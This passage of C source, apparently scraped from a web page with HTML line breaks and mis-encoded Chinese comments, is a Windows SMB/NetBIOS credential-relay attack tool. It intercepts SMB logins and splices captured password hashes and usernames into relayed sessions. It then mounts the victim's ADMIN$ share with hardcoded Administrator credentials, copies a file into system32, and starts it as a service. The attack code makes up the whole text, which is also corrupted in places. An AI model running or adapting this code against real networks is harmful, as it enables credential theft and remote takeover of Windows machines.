// psexec(1);<BR> if(argc<5){<BR> printf("\n \
error!\n");<BR> printf("\n usage: %s [rnebios to ip] [rnetbios \
bind ip] [rnetbios bind ip2] [rnetbios client ip][new can netbios \
ip]",argv[0]);<BR> \
printf("\n\n");<BR> exit(1);<BR> }<BR> <BR> \
result= WSAStartup(MAKEWORD(1, 1), &wsaData);<BR> if (result != 0) \
{<BR> fprintf(stderr, "Your computer was not connected "<BR> "to \
the Internet at the time that "<BR> "this program was launched, or you \
"<BR> "do not have a 32-bit "<BR> "connection to the \
Internet.");<BR> exit(2);<BR> }<BR> /*<BR> \
for(i=0,j=0;i<16;++i){<BR> name=servername[i] \
;<BR> if(name==0) \
j=1;<BR> if(j==1) \
name=0x20;<BR> namebuff[2*i+5]= ( (name >> 4) & \
0x000F ) + 'A';<BR> namebuff[2*i+6]= (name & 0x000F) + \
'A';<BR> }<BR> namebuff[37]=0; <BR>*/<BR> \
d_ip=-1;<BR> d_ip = inet_addr(argv[1]);<BR> \
if(d_ip==-1){<BR> he = \
gethostbyname(argv[1]); <BR> if(!he) printf("\n Can't \
get the ip of %s !\n",argv[1]); \
//server);<BR> \
else memcpy(&d_ip, he->h_addr, sizeof(d_ip));<BR> } \
<BR> <BR> if(d_ip==0) \
d_ip=-1;<BR> if(d_ip==-1){<BR> loginhimself=1;<BR> printf("\n \
rnetbios to the netbios ip.");<BR> }<BR> else \
{<BR> loginhimself=0;<BR> printf("\n rnetbios to %s",argv[1]); \
//server);<BR> }<BR> s_in1.sin_addr.s_addr=d_ip;<BR> fd2 = \
socket(AF_INET, SOCK_STREAM,0);<BR> s_in2.sin_family = \
AF_INET;<BR> s_in2.sin_port = htons(SERVERPORT);<BR> \
s_in2.sin_addr.s_addr = 0;<BR> s_in2.sin_addr.s_addr = \
inet_addr(argv[2]);<BR> if(s_in2.sin_addr.s_addr==0||s_in2.sin_addr.s_addr==-1){<BR> \
printf("\n\n argv[2] ip error. use the ip: \
192.168.0.2");<BR> s_in2.sin_addr.s_addr = \
inet_addr("192.168.0.2");<BR> }<BR> i=bind(fd2,&s_in2, \
sizeof(s_in2));<BR> if(i<0){<BR> \
i=WSAGetLastError();<BR> printf("\n bind error \
0x%x",i);<BR> exit(1);<BR> \
}<BR> <BR> i=listen(fd2,100); <BR> if(i<0){<BR> \
i=WSAGetLastError();<BR> printf("\n bind error \
0x%x",i);<BR> exit(1);<BR> \
}<BR> <BR> s_in3.sin_family = AF_INET;<BR> \
s_in3.sin_port = htons(SERVERPORT);<BR> s_in3.sin_addr.s_addr = \
0;<BR> s_in3.sin_addr.s_addr = \
inet_addr(argv[3]);<BR> if(s_in3.sin_addr.s_addr==0||s_in3.sin_addr.s_addr==-1){<BR> \
printf("\n\n argv[3] ip error. use the ip: \
192.168.0.3");<BR> s_in3.sin_addr.s_addr = \
inet_addr("192.168.0.3");<BR> }<BR> \
<BR> bindip=s_in3.sin_addr.s_addr;<BR> for(i=0;i<BINDNUM;++i){<BR> \
fd3[i] = socket(AF_INET, SOCK_STREAM,0);<BR> bind(fd3[i],&s_in3, \
sizeof(s_in3));<BR> listen(fd3[i],1 0); \
<BR> \
s_in3.sin_addr.s_addr=ntohl(htonl(s_in3.sin_addr.s_addr)+1);<BR> \
}<BR> <BR> s_in4.sin_addr.s_addr = 0;<BR> s_in4.sin_addr.s_addr = \
inet_addr(argv[4]);<BR> if(s_in4.sin_addr.s_addr==0||s_in4.sin_addr.s_addr==-1){<BR> \
printf("\n\n argv[4] ip error. use the ip: \
192.168.0.4");<BR> s_in4.sin_addr.s_addr = \
inet_addr("192.168.0.4");<BR> }<BR> <BR> \
for(i=0;i<THREADNUM;++i){<BR> <BR> rinfo[i].socketclient=fd2;<BR> \
rinfo[i].socketserver=fd3[i];<BR> rinfo[i].ipclient=s_in2.sin_addr.s_addr;<BR> & \
nbsp;rinfo[i].iprnetbios=ntohl(htonl(bindip)+i);<BR> rinfo[i].ippsexec=s_in4.sin_addr.s_addr;<BR> rinfo[i].ipdest=d_ip;<BR> \
CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)rnetbiosthread,(LPVOID)&rinfo[i],(DWORD)0,(LPDWORD)&ThreadID); \
<BR> <BR> } <BR>
Sleep(0x7fffffff);<BR>
// closesocket(fd1);<BR> \
closesocket(fd2);<BR> // closesocket(fd3);<BR> // \
closesocket(fd4);<BR> WSACleanup( );<BR> \
return(0); <BR>}<BR> <BR> void psexec(PSINFO *info) <BR> {<BR> \
/*<BR> SECURITY_ATTRIBUTES sa;<BR> PROCESS_INFORMATION \
ProcessInformation;<BR> HANDLE \
hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; <BR> STARTUPINFO \
siinfo;<BR> <BR>*/<BR> PSINFO psinfo=*info;<BR> \
NETRESOURCE lpNetResource;<BR> int fd1,i;<BR> // char \
*ip2;<BR> char cmdstr[0x100];<BR> char res[0x100];<BR> char \
filename[0x100];<BR> char tempfilename[0x100];<BR> char \
ser[0x100];<BR>// char *name="cc.exe";<BR> char \
*user="Administrator";<BR> char *pass="test";<BR> SC_HANDLE scm,svc; \
<BR> char *cmdstrformat="psexec.exe <A>\\\\%s</A> -u Administrator -p test -s \
cmd.exe";<BR>// char *cmdstrformat="<A>\\\\%s\\admin$</A> ";<BR> // \
fd1=*(int *)(ip);<BR> // ip2=*(int *)(ip+4)+8;<BR> // \
ip2="192.168.70.29";<BR> wsprintf(cmdstr,cmdstrformat,psinfo.ip); \
//"127.0.0.1"); //<BR> \
GetTempPath(0x100,tempfilename);<BR> \
GetTempFileName(tempfilename,NULL,NULL,tempfilename);<BR> \
DeleteFile(tempfilename);<BR> \
for(i=strlen(tempfilename);i>0;--i){<BR> \
if(tempfilename[i]=='\\')<BR> {<BR> \
strcpy(tempfilename,tempfilename+i+1);<BR> \
break;<BR> }<BR> }<BR> // system(cmdstr);<BR> // \
ExitThread(0);<BR> wsprintf(res,"<A>\\\\%s\\admin$",psinfo.ip</A>); \
<BR> wsprintf(filename,"<A>\\\\%s\\admin$\\system32\\%s",psinfo.ip,tempfilename</A>); \
<BR> wsprintf(ser,"<A>\\\\%s",psinfo.ip</A>); <BR> \
lpNetResource.dwScope=RESOURCE_CONNECTED;<BR> lpNetResource.dwType \
=RESOURCETYPE_DISK;<BR> lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;<BR> \
lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;<BR> \
lpNetResource.lpLocalName=NULL;<BR> lpNetResource.lpRemoteName=res;<BR> \
lpNetResource.lpComment=NULL;<BR> lpNetResource.lpProvider=NULL;<BR> <BR> \
i=WNetAddConnection2A(&lpNetResource,user,pass,CONNECT_UPDATE_PROFILE);<BR> \
scm=OpenSCManager(ser,NULL,SC_MANAGER_CREATE_SERVICE);<BR> printf("\n scm=0x%x err=0x%x \
ip=%s",scm,GetLastError(),psinfo.ip);<BR> \
svc=CreateService(scm,tempfilename,tempfilename,SERVICE_ALL_ACCESS, \
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_IGNORE, \
tempfilename,NULL,NULL,NULL,NULL,NULL);<BR> if(svc==NULL) \
svc=OpenService(scm,tempfilename,SERVICE_ALL_ACCESS);<BR> printf("\n svc=0x%x \
err=0x%x",svc,GetLastError());<BR> i=CopyFile(psinfo.filename,filename,TRUE);<BR> \
printf("\n copy file error=0x%x ip=%s", GetLastError(),psinfo.ip);<BR> <BR> \
i=StartService(svc,0,NULL);<BR> printf("\n i=0x%x \
error=0x%x",i,GetLastError());<BR> i=DeleteService(svc);<BR> \
DeleteFile(filename);<BR> <BR>
<BR> // printf("\n cmdstr=%s\n",cmdstr);<BR> \
/*<BR> \
sa.nLength=12;<BR> \
sa.lpSecurityDescriptor=0;<BR> \
sa.bInheritHandle=TRUE;<BR> <BR> \
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);<BR> \
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);<BR> <BR> \
ZeroMemory(&siinfo,sizeof(siinfo));<BR> <BR> \
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;<BR> \
siinfo.wShowWindow = SW_HIDE;<BR> siinfo.hStdInput = \
hReadPipe2;<BR> siinfo.hStdOutput=hWritePipe1;<BR> \
siinfo.hStdError =hWritePipe1;<BR>// CreateProcess(NULL,&cmdstr,NULL,NULL,1,0,NULL,NULL \
,&siinfo,&ProcessInformation); \
<BR> */<BR> // system(cmdstr);<BR> <BR> // printf("\n psexec end. \
closesocket fd1=0x%x",fd1);<BR> <BR> CloseServiceHandle(scm);<BR> \
CloseServiceHandle(svc);<BR> // closesocket(fd1);<BR> // \
closesocket(fd2); <BR> \
i=WNetCancelConnection2A(res,CONNECT_UPDATE_PROFILE,TRUE);<BR> \
ExitThread(0);<BR> printf("\n Exitthread erro1 !");<BR> \
return;<BR> }<BR> <BR>void rnetbiosthread(RSERVER \
*rinfoadd)<BR>{<BR> <BR> RSERVER \
rinfo;<BR> int i,fd1,fd2;<BR> \
struct sockaddr_in s_in1,s_in2;<BR> SOCKET dip;<BR> \
rinfo=*rinfoadd;<BR> // \
memcpy(&rinfo,rinfoadd,sizeof(rinfo));<BR> dip=rinfo.ipdest;<BR> \
while(1)<BR> {<BR> i=sizeof(struct \
sockaddr);<BR> \
fd1=accept(rinfo.socketclient,&s_in1,&i);<BR> \
if(s_in1.sin_addr.s_addr!=rinfo.ipclient)<BR> \
{<BR> <BR> if(rinfo.ipdest==-1) \
dip=s_in1.sin_addr.s_addr;<BR> \
fd2 = socket(AF_INET, \
SOCK_STREAM,0);<BR> \
s_in2.sin_family = AF_INET;<BR> \
s_in2.sin_port = htons(SERVERPORT);<BR> \
s_in2.sin_addr.s_addr = dip;<B R>
printf("\n Connect \
%s",inet_ntoa(s_in2.sin_addr));<BR> \
if(!connect(fd2, (struct sockaddr *)&s_in2, sizeof(struct \
sockaddr_in)))<BR> {<BR> \
<BR> \
printf("\n Connect %s \
ok!",inet_ntoa(s_in2.sin_addr));<BR> \
rinfo.socketconnects=fd1;<BR> \
rinfo.socketconnectd=fd2;<BR> <BR> \
rnetbios(&rinfo);<BR> // printf("\n rnetbios return");<BR>
}<BR> else printf("\n Connect %s \
error!",inet_ntoa(s_in2.sin_addr));<BR> closesocket(fd2);<BR> \
}<BR> closesocket(fd1);<BR> }<BR> <BR> \
ExitThread(1);<BR> <BR>}<BR> void rnetbios(RSERVER \
*rinfoadd)<BR> {<BR> <BR> RNET \
rnetinfo;<BR> RSERVER rinfo=*rinfoadd;<BR>// PSINFO psinfo; \
<BR> int fd,fd2,fd3,fd4;<BR> struct sockaddr_in \
s_in1,s_in2,s_in4;<BR> <BR> char buff[BUFFSIZE+1];<BR> char \
buff72[BUFFSIZE+1];<BR> char buff73[BUFFSIZE+1];<BR> char \
buff73ok[BUFFSIZE+1];<BR> char filename[BUFFSIZE+1];<BR> char \
buff0x82[]={0x82,0,0,0};<BR> char namereq[]={0x81,0,0,0};<BR> // int \
long72=0;<BR> <BR> u_short name;<BR> char \
buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41<BR> \
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};<BR>
char namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46<BR> \
,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00<BR> \
,0x20,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,0x43,0x41,0x43,0x41<BR> \
,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,00<BR> \
};<BR> char ipbuff[0x100];<BR> char \
namereturn[]={0x82,0,0,0,0,0};<BR> <BR> struct sockaddr addr2;<BR> int \
i,j,k,exitcode;<BR> //,k,l,ii;<BR> // int usernameaddress1;<BR> // int \
usernameaddress2;<BR> <BR> <BR> // int strflg1,strflg2;<BR> \
DWORD ThreadID;<BR> \
HANDLE threadhandle=0;<BR> <BR> // \
BOOL loginok;<BR> <BR> \
s_in1.sin_addr.s_addr=rinfo.iprnetbios;<BR> wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));<BR>
nameuncode(namebuff,ipbuff);<BR>
<BR> fd=fd2;<BR>
\
fd2=rinfo.socketconnects;<BR> \
fd3=rinfo.socketconnectd;<BR> fd4=0;<BR> \
rnetinfo.fd2=fd2;<BR> rnetinfo.fd3=fd3;<BR> rnetinfo.fd4=fd4;<BR> \
rnetinfo.buff=buff;<BR> rnetinfo.buff72=buff72;<BR> rnetinfo.buff73=buff73;<BR> \
rnetinfo.buff73ok=buff73ok;<BR> rnetinfo.filename=filename;<BR> \
rnetinfo.buffgetname=buffgetname;<BR> rnetinfo.ipbuff=ipbuff;<BR> rnetinfo.namebuff=namebuff;<BR> \
rnetinfo.buff0x82=buff0x82;<BR> \
rnetinfo.namereq=namereq;<BR> rnetinfo.long72add=&rnetinfo.long72;<BR> rnetinfo.long72=0;<BR> \
rnetinfo.long73okadd=&rnetinfo.long73ok;<BR> rnetinfo.long73ok=0;<BR> \
rnetinfo.loginok=FALSE;<BR> <BR> // printf("\n Connect \
%s",inet_ntoa(s_in2.sin_addr));<BR> i = \
1;<BR> ioctlsocket(fd2, FIONBIO, \
&i);<BR> i = 1;<BR> \
ioctlsocket(fd3, FIONBIO, &i);<BR> <BR> i = \
1;<BR> ioctlsocket(rinfo.socketserver, FIONBIO, \
&i);<BR> \
<BR> <BR> ThreadID=0;<BR> \
memset(buff,0,BUFFSIZE);<BR> memset(filename,0,BUFFSIZE);<BR> \
while(1)<BR> {<BR> \
if(rnetinfo.loginok==TRUE)<BR> {<BR> & \
nbsp; \
i=GetExitCodeThread(threadhandle,&exitcode);<BR> if(i==1&&exitcode!=STILL_ACTIVE){<BR> \
// printf("\n psexec exit 0x%x \
code",exitcode);<BR> \
break;<BR> }<BR> }<BR> \
\
Sleep(5);<BR> \
<BR> // \
if(rnetinfo.loginok==TRUE) recv(fd2,buff,BUFFSIZE,0);<BR> \
i=recv(fd,buff,BUFFSIZE,0);<BR> if(i<=0&&WSAGetLastError()==0x2746) \
{<BR> // printf("\n recv fd 0x%x bytes. \
error=0x2746",i);<BR> break;<BR> \
}<BR> if(i>0)<BR> {<BR> \
rnetinfo.recvbytes=i;<BR> if(rnetchan \
gepacket(&rnetinfo)==TRUE)<BR> \
{<BR> \
threadhandle=waitfd4(&rnetinfo,&rinfo); \
<BR> <BR> }<BR>   \
; \
memset(buff,0,BUFFSIZE);<BR> \
<BR> }<BR> \
<BR> \
<BR> \
i=recv(fd3,buff,BUFFSIZE,0);<BR> \
if(i<=0&&WSAGetLastError()==0x2746) {<BR> \
// printf("\n recv fd3 0x%x bytes. \
error=0x2746",i);<BR> break;<BR> \
}<BR> \
if(i>0)<BR> {<BR> \
rnetinfo.recvbytes=i; <BR> \
if(rnetchangepacket2(&rnetinfo)==TRUE)<BR> {<BR> &nb \
sp; \
threadhandle=waitfd4(&rne tinfo,&rinfo); \
<BR> <BR> }<BR>  \
; \
memset(buff,0,BUFFSIZE);<BR> \
<BR> }<BR>
if(rnetinfo.loginok==FALSE) \
fd=fd2;<BR> else &nb \
sp; \
fd=rnetinfo.fd4;<BR> \
rnetinfo.fd=fd;<BR> <BR> }<BR>
<BR> \
closesocket(fd2);<BR> closesocket(fd3);<BR> \
closesocket(rnetinfo.fd4);<BR> CloseHandle(threadhandle);<BR> \
return;<BR>}<BR> <BR>
<BR>
<BR>
<BR>void nameuncode(char *namebuff,char *ipbuff)<BR>{<BR>
int i,j;<BR> u_short name;<BR> char \
servername[]={"*SMBSERVER"};<BR> for(i=0,j=0;i<16;++i){<BR> \
name=ipbuff[i]; //servername[i] \
;<BR> if(name==0) \
j=1;<BR> if(j==1) \
name=0x20;<BR> namebuff[2*i+0x27]= ( (name >> 4) \
& 0x000F ) + 'A';<BR> namebuff[2*i+0x28]= (name & \
0x000F) + 'A';<BR> }<BR> for(i=0,j=0;i<16;++i){<BR> \
name=servername[i] \
;<BR> if(name==0) \
j=1;<BR> if(j==1) \
name=0x20;<BR> namebuff[2*i+5]= ( (name >> 4) & \
0x000F ) + 'A';<BR> namebuff[2*i+6]= (name & 0x000F) + \
'A';<BR> }<BR> \
namebuff[0x25]=0;<BR> namebuff[0x47]=0;<BR> return;<BR>}<BR> <BR>
<BR>int newsend(int fd,char *buff,int size,int flag)<BR>{<BR>
int j;<BR> int i = 0;<BR> ioctlsocket(fd, FIONBIO, \
&i);<BR> j=send(fd,buff,size,flag);<BR> i = \
1;<BR> ioctlsocket(fd, FIONBIO, &i);<BR> return j; <BR>}<BR> \
<BR>void changepass(char *buff11,char *buff7311)<BR>{<BR> <BR> \
char *buff=*(int *)buff11;<BR> char \
*buff73=*(int *)buff7311;<BR> int \
usernameaddress1;<BR> int usernameaddress2;<BR> \
int strflg1,strflg2; <BR> u_short \
name; <BR> \
memcpy(buff+0x41,buff73+0x41,0x18);<BR> // copy \
password<BR> if(buff[0x35]==0x18) \
memcpy(buff+0x41+0x18,buff73+0x41+0x18,0x18);<BR> <BR> \
// copy the next password<BR> \
strflg1=buff73[0x0f];<BR> \
strflg1&=0x80;<BR> if(strflg1!=0) \
strflg1=1;<BR> \
strflg2=buff[0x0f];<BR> \
strflg2&=0x80;<BR> if(strflg2!=0) \
strflg2=1;<BR> //str is unicode ?<BR> \
\
usernameaddress1=0x41+0x18+buff73[0x35]+strflg1;<BR> \
usernameaddress2=0x41+0x18+buff[0x35]+strflg2;<BR> \
name=1;<BR> \
while(name!=0){<BR> name=buff73[usernameaddress1];<BR> if(strflg1==0) \
++usernameaddress1;<BR> else \
usernameaddress1+=2;<BR> buff[usernameaddre \
ss2]=name;<BR> ++usernameaddress2;<BR> if(strflg2!=0) \
{<BR> ++usernameaddress2;<BR> buff[usernameaddres
s2]=0;<BR> }<BR> \
} <BR> // copy user name \
£¬²»¹»ÑϽ÷£¬²»¹ýÃãÇ¿ÄÜÓá£<BR> }<BR>
<BR>
BOOL rnetchangepacket(RNET *rnetinfoadd)<BR>{<BR> <BR> <BR> char \
filename[0x100];<BR> unsigned char name;<BR> int \
i,j,k;<BR> RNET rnetinfo=*rnetinfoadd;<BR> \
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32)<BR> {<BR> \
i=*(WORD *)(rnetinfo.buff+0x41);<BR> \
if(i==0x05&&rnetinfo.recvbytes>0x4e&&rnetinfo.buff[0x4e]!=0)<BR> \
{ <BR> \
memcpy(rnetinfo.filename,rnetinfo.buff+0x4e,rnetinfo.recvbytes-0x4e);<BR> // \
*(int *)(rnetinfo.buff+9)=0xc0000016;<BR> \
// \
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);<BR> \
// closesocket(rnetinfo.fd2);<BR> \
printf("\n get file name ok!");<BR> \
return(TRUE);<BR> }<BR> \
if(i==0x01&&rnetinfo.recvbytes>0x54&&rnetinfo.buff[0x54]!=0)<BR> \
{<BR> memcpy(rnetinfo.filename,rnetinfo.buff+0x54,rneti \
nfo.recvbytes-0x54);<BR> // *(int \
*)(rnetinfo.buff+9)=0xc0000016;<BR> \
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);<BR> // \
closesocket(rnetinfo.fd2);<BR> <BR> \
printf("\n get file name ok!");<BR> return(TRUE);<BR> } \
<BR> }<BR> <BR> \
if(rnetinfo.buff[0x8]==0x72)<BR> \
{<BR> if(rnetinfo.loginok==FALSE)<BR> {<BR> // \
memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);<BR> \
memset(rnetinfo.buff+0xc,0,4);<BR> \
rnetinfo.long72=rnetinfo.recvbytes;<BR> \
//Õâ¶ùÊÇϵͳ֧³Öʲô·þÎñµÄ±ê¼Ç£¬WIN2000ÓëWINNTϵͳ²»Ò»Ñù¡£<BR> \
//ÓÐÒ»·½ÊÇWINNT¿´Ò»°ã¾ÍÊÇ0£¬¶øÁ½·½¶¼ÊÇWIN2000ºóÃæÐÒéµÄÃÜ \
뷽ʽ¾Í²»Ò»Ñù¡£<BR> \
//ÉèÖóÉ0£¬ÆÛÆÈÃÆäÒÔWINNTµÄ·½Ê½·¢ËͼÓÃܵÄÃÜ \
룬ÒԺýػñ¡£µ«¿ÉÄÜWIN2000Ö§³Ö²»ºÃ¡£<BR> // printf("\n fd2 recv \
smb 0x72 packet \
");<BR> }<BR> else<BR> { < \
BR> \
memcpy(rnetinfo.buff72+0x1c,rnetinfo.buff+0x1c,8);<BR> memcpy \
(rnetinfo.buff,rnetinfo.buff72,rnetinfo.long72);<BR> // \
printf("\n send smb 0x72 packet \
.");<BR> rnetinfo.buff[0x25]=5;<BR> \
//run in win9x.the win9x netbios client use <BR> \
//Õâ¶ù¿Í»§¶Ë¿ÉÄÜÒªWIN9X£¬²»ÖªµÀWINT¡£WIN2000Ôõô´¦Àí¡£<BR> ne \
wsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.long72,0);<BR> retur \
n(FALSE);<BR> rnetinfo.recvbytes=0;<BR> \
}<BR> <BR> }<BR> if(rnetinfo.buf \
f[0x8]==0x73||rnetinfo.buff[0x8]==0x75)<BR> \
{<BR> <BR> \
if(rnetinfo.loginok==FALSE)<BR> {<BR> \
if(rnetinfo.buff[0x33]==0x18)<BR> \
{<BR> \
memcpy(rnetinfo.buff73,rnetinfo.buff,rnetinfo.recvbytes); \
<BR> \
}<BR> <BR> i=*(WORD \
*)(rnetinfo.buff+0x27);<BR> if(rnetinfo.buff[0x8]==0x75) \
i=0x20;<BR> j=*(unsigned \
char *)(rnetinfo.buff+0x4+i);<BR> i+=*(WORD \
*)(rnetinfo.buff+i+0x0b);<BR> \
i=i+2*j+7; \
<BR> \
memcpy(filename,rnetinfo.buff+i,sizeof(filename));<BR> \
j=1;<BR> if(filename[1]==0) \
j=2;<BR> \
for(i=0,k=0;i<0x100;i+=j,++k)<BR> \
{<BR> \
name=filename[i];<BR> \
filename[k]=name;<BR> &nb \
sp; \
// if(i==0&&name=='\\') \
k-=1;<BR> \
}<BR> for(i=strlen(filename);i>0;--i)<BR> \
{<BR> &nb \
sp; \
name=filename[i];<BR> \
if(name=='\\')<BR> \
{<BR> \
strcpy(filename,filename+i+1);<BR> \
break;<BR> }<BR> \
}<BR> \
<BR> <BR> \
if(strcmp(filename,"IPC$")!=0&&strcmp(filename,"ADMIN$")!=0)<BR> \
{<BR> <BR> \
strcpy(rnetinfo.filename,filename);<BR> printf("\n file \
name=%s",filename);<BR> // closesock \
et(rnetinfo.fd2);<BR> // printf("\n the new get file name \
ok!");<BR> \
return(TRUE);<BR> } \
<BR> } <BR> \
else{<BR> \
<BR> <BR> \
if(rnetinfo.buff[0x33]==0x18)<BR> {<BR> \
// printf("\n send login ok \
packet.");<BR> // printf("\n send \
login ok packet.");<BR> // \
newsend(rnetinfo.fd,rnetinfo.buff73ok,rnetinfo.long73ok,0);<BR> // return;<BR> \
changepass(&rnetinfo.buff,&rnetinfo.buff73);<BR> \
memcpy(rnetinfo.buff+0x20,rnetinfo.buff73ok+0x20,2); //user \
id<BR> }<BR> }<BR> }<BR> \
if(memcmp(rnetinfo.buff,rnetinfo.namereq,3)==0) <BR> {<BR> \
if(rnetinfo.loginok==FALSE) <BR> \
{<BR> \
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);<BR> \
// printf("\n send fd3 0x%x 0x%x \
bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);<BR> \
}<BR> else <BR> \
{<BR> \
rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff0x82,0x6,0);<BR> \
// rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);<BR> \
// printf("\n send fd3 0x%x 0x%x \
bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);<BR> } \
<BR> }<BR> else<BR> {<BR> \
if(rnetinfo.loginok==FALSE) \
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);<BR> \
else<BR> {<BR> // \
memcpy(rnetinfo.buff73+0x1c,rnetinfo.buff73ok+0x1c,8);<BR> \
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0); \
<BR> } <BR> <BR> // \
printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);<BR> <BR> \
}<BR> return(FALSE);<BR>}<BR> <BR> \
<BR> BOOL rnetchangepacket2(RNET *rnetinfoadd)<BR>{<BR>
RNET rnetinfo=*rnetinfoadd; <BR> \
if(rnetinfo.buff[0x8]==0x72)<BR> \
{<BR> if(rnetinfo.loginok==FALSE){<BR> \
memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);<BR> // \
memset(rnetinfo.buff+0xc,0,4);<BR> \
*rnetinfo.long72add=rnetinfo.recvbytes;<BR> <BR> \
}<BR> <BR> }<BR> \
if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)<BR> \
{<BR> if(*(int \
*)(rnetinfo.buff+9)==0&&rnetinfo.buff73[0x33]==0x18&&rnetinfo.loginok==FALSE)<BR> \
{<BR> \
memcpy(rnetinfo.buff73ok,rnetinfo.buff,rnetinfo.recvbytes);<BR> \
*rnetinfo.long73okadd=rnetinfo.recvbytes;<BR> \
// rnetinfo.loginok=TRUE; <BR> // \
closesocket(rnetinfo.fd2);<BR> printf("\n now login \
ok!");<BR> // \
rnetinfo.recvbytes= 0; <BR> // \
return(TRUE);<BR> \
}<BR> <BR> }<BR>
<BR> \
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)<BR> \
{<BR> // *(int *)(rnetinfo.buff+9)=0xc0000016;<BR> \
} <BR> rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.recvbytes,0);<BR> \
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)<BR> \
{<BR> // closesocket(rnetinfo.fd2);<BR> \
// return(TRUE);<BR> } <BR> \
// printf("\n send fd 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);<BR> \
return(FALSE);<BR>}<BR> <BR>int \
waitfd4(RNET *rnetinfo,RSERVER *rinfoadd)<BR>{<BR> // RNET \
rnetinfo=*rnet;<BR> RSERVER rinfo=*rinfoadd;<BR> int \
i,j,k,threadhandle,exitcode;<BR> unsigned char name;<BR> char \
*ipbuff[0x100];<BR> PSINFO psinfo;<BR> struct \
sockaddr_in s_in1,s_in2,s_in4;<BR> struct sockaddr \
addr2;<BR> DWORD \
ThreadID;<BR>   \
; \
rnetinfo->loginok=TRUE;<BR> \
\
s_in1.sin_addr.s_addr=rinfo.iprnetbios;<BR> \
wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));<BR> \
\
psinfo.ip=&ipbuff;<BR>/*<BR> i=*(WORD \
*)(rnetinfo->buff73+0x27);<BR> &nb \
sp; \
j=*(unsigned char *)(rnetinfo->buff73+0x4+i);<BR> \
i+=*(WORD *)(rnetinfo->buff73+i+0x0b);<BR> \
i=i+2*j+7; \
<BR> psinfo.filename=rnetinfo->buff73+i;<BR> \
j=1;<BR> \
if(psinfo.filename[1]==0) \
j=2;<BR> \
for(i=0,k=0;i<0x100;i+=j,++k)<BR> \
\
{<BR> & \
nbsp; \
name=psinfo.filename[i];<BR> &n \
bsp; \
psinfo.filename[k]=name;<BR>   \
; \
// if(i==0&&name=='\\') \
k-=1;<BR> &nb \
sp; }<BR> \
\
for(i=strlen(psinfo.filename);i>0;--i)<BR> \
{<BR> & \
nbsp; \
name=psinfo.filename[i];<BR> \
if(name=='\\')<BR> \
\
{<BR> \
strcpy(psinfo.filename,psinfo.filename+i+1);<BR> \
break;<BR> &n
bsp; \
}<BR> \
}<BR>
*/<BR> <BR> \
psinfo.filename=rnetinfo->filename;<BR> \
\
j=1;<BR> if(rnetinfo->filename[1]==0) \
j=2;<BR> \
for(i=0,k=0;i<0x100;i+=j,++k)<BR> \
\
{<BR> &nb
sp; name=rnetinfo->filename[i];<BR> &n \
bsp; \
rnetinfo->filename[k]=name;<BR> &n \
bsp; \
if(i==0&&name=='\\') \
k-=1;<BR> &nb \
sp; }<BR> \
<BR> printf("\n filename=%s\n",psinfo.filename);<BR> \
\
threadhandle=CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)psexec,(L \
PVOID)&psinfo,(DWORD)0,(LPDWORD)&ThreadID);<BR> // break;<BR> \
while(1){<BR> \
Sleep(5);<BR>   \
; \
if(rnetinfo->loginok==TRUE)<BR> \
{<BR> & \
nbsp; &
nbsp; i=GetExitCodeThread(threadhandle,&exitcode);<BR> \
\
if(i==1&&exitcode!=STILL_ACTIVE){<BR> \
\
